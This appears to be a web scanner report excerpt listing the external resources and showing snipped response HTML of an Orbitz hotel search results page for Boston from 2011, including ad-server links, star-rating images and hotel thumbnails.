http://www.revresda.com/image.ng/adsize=568x143&pos=top1&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=728x90&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=728x90&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png
http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif
http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif
http://www.tnetnoc.com/siteImages/ORB/banners/hotel/results/telesales/ORB_Telesales_StalkBar-1.png
http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchBar/marketing/ORB_Hotel_Marketing_Banner-1.png
http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png
http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star1/medium/star1-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/value/value/other/specialOfferGraphic-1.png
http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css
http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js
http://www.tnetnoc.com/static/27.4.7/style/global/printAll.css
http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101
https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&dn=www.orbitz.com&lang=en

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C11231%7C+%7C%26%26HE; Expires=Thu, 03-Mar-2011 15:23:54 GMT; Path=/
Set-Cookie: myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____11231_2_1_1_1%7D; Expires=Wed, 01-Feb-2012 15:24:06 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Feb 2011 15:24:05 GMT
Content-Length: 631035

...[SNIP]...
<link rel="canonical" href="http://www.orbitz.com/hotels/United_States--MA/Boston/"/>
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/style/global/printAll.css" media="print">
               
       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=728x90&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=728x90&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=468x60&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=468x60&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<a href="http://www.orbitz.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png" alt="Orbitz" height="28" width="153" class="logo" />
    </a>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/results/telesales/ORB_Telesales_StalkBar-1.png" alt="Call us to book 1-800-733-1297" height="58" width="160" />
    </div>
...[SNIP]...
http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=fees-cut&cnt=OVI&type=cs_ht" class="link" agent="{
       type:'PopupWindow'

   }" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchBar/marketing/ORB_Hotel_Marketing_Banner-1.png" alt="" height="29" width="960" class="searchBarBanner" />
    </a>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="starRating" /></span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="starRating" /></span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="starRating" /></span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="starRating" /></span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star1/medium/star1-1.png" alt="1 star" height="13" width="70" class="starRating" /></span>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1"><a href="http://www.revresda.com/click.ng/adsize=568x143&pos=top1&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=568x143&pos=top1&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=24684&hotel.hotelDetailsKey=24684_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/hotelthumbnails/46/84/24684/24684_TBNL_1229584836582.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
in=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=1680&hotel.hotelDetailsKey=1680_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/hotelthumbnails/16/80/1680/1680_TBNL_1244093332054.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=11576&hotel.hotelDetailsKey=11576_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/hotelimages/979/62979/12870181/TBNL0-20100831-080243-389.jpg"
           }
   }" /> </a>
...[SNIP]...
<div class="specialOffers" >

        <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/other/specialOfferGraphic-1.png" alt="Special Offer" height="50" width="140" class="valueIcon" />
    <div class="offerText">
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=38354&hotel.hotelDetailsKey=38354_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/hotelthumbnails/83/54/38354/38354_TBNL_1244093277798.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=69706&hotel.hotelDetailsKey=69706_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/hotelimages/121/8121/12779181/TBNL0-20100720-121754-738.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=27748&hotel.hotelDetailsKey=27748_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/pegsimages/HY/thumb_914.jpg"
           }
   }" /> </a>
...[SNIP]...
<div class="specialOffers" >

        <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/other/specialOfferGraphic-1.png" alt="Special Offer" height="50" width="140" class="valueIcon" />
    <div class="offerText">
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=190748&hotel.hotelDetailsKey=190748_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/hotelthumbnails/7/48/190748/190748_TBNL_1244092730087.jpg"
           }
   }" /> </a>
...[SNIP]...
<div class="specialOffers" >

        <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/other/specialOfferGraphic-1.png" alt="Special Offer" height="50" width="140" class="valueIcon" />
    <div class="offerText">
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=177104&hotel.hotelDetailsKey=177104_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/hotelimages/396/48396/13077361/TBNL0-20101117-091654-672.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=24646&hotel.hotelDetailsKey=24646_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/hotelimages/271/271/12897991/TBNL0-20100921-112659-553.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=10667&hotel.hotelDetailsKey=10667_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/hotelimages/977/977/12703771/TBNL0-20100521-011413-714.jpg"
           }
   }" /> </a>
...[SNIP]...
<div class="specialOffers" >

        <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/other/specialOfferGraphic-1.png" alt="Special Offer" height="50" width="140" class="valueIcon" />
    <div class="offerText">
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=259146&hotel.hotelDetailsKey=259146_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/pegsimages/BR/thumb_BOSWF.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=229656&hotel.hotelDetailsKey=229656_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/hotelimages/570/67570/12904161/TBNL0-20100924-093212-307.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=79290&hotel.hotelDetailsKey=79290_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/pegsimages/CY/thumb_BOSDM.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=29957&hotel.hotelDetailsKey=29957_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/pegsimages/MC/thumb_BOSCB.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=230082&hotel.hotelDetailsKey=230082_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/hotelimages/915/66915/12511591/TBNL0-20091214-023400-486.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=177042&hotel.hotelDetailsKey=177042_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/pegsimages/WI/thumb_1528.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=21586&hotel.hotelDetailsKey=21586_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/hotelthumbnails/15/86/21586/21586_TBNL_1229682447097.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=205372&hotel.hotelDetailsKey=205372_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/hotelimages/972/60972/189715911/TBNL0-20110128-072105-553.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=319853&hotel.hotelDetailsKey=319853_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/hotelthumbnails/98/53/319853/319853_TBNL_1251457089298.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=283875&hotel.hotelDetailsKey=283875_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/hotelthumbnails/38/75/283875/283875_TBNL_1242121247354.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=11149&hotel.hotelDetailsKey=11149_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
